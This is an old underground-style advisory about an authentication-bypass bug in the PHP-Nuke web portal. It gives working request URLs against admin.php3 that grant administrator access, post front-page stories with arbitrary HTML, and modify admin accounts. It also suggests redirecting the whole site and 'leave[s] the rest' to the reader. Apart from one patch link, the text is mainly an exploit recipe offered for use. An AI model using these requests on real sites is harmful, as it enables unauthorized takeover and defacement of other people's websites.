php-nuke bug by Starman_Jones 22/08/00 Disclaimer: I am not responsible for whatever you do with the knowledge you get from reading this advisorie. I am not telling you to go and post messages on sites that use PHP-nuke. Recently there was an advisory on bugtraq about An access validation error that exists in PHP-nuke Web Portal System. With this bug it is possible for a remote user to gain administrative privileges. http://www.target.com/admin.php3?admin=anything The above example lets you login as the administrator. But you cannot do anything with that url alone. When you click on anything in the administrator's control panel you get asked for a username and password. I have found a way to bypass this. http://www.example.com/admin.php3?admin=anything&op=PostAdminStory&introtext=evil%20hacker%20message The Above example lets you post a topic on the main page as an administrator. You can add html tags to it. And a topic. To seperate the text you want to display you use '%20' without the ''. You could also put html in the message and make the whole front page redirect to some other page. Anyway you get the idea. You can also edit the existing admin accounts by doing: http://www.example.com/admin.php3?admin=anything&op=mod_authors With &op= whatever is in teh administration menu you can control everything that it lets you. I will not go into anything else. I just wanted to show you how to post as an administrator and leave the rest up to you. The patch for this bug is available at: http://www.ncc.org.we/php-nuke.php3?op=download&location=http://download.sourceforge.net/phpnuke&file=PHP-Nuke-3.0.tar.gz You can post this text on any page as long as you give proper credit to me: Starman_Jones. Copyright Starman_Jones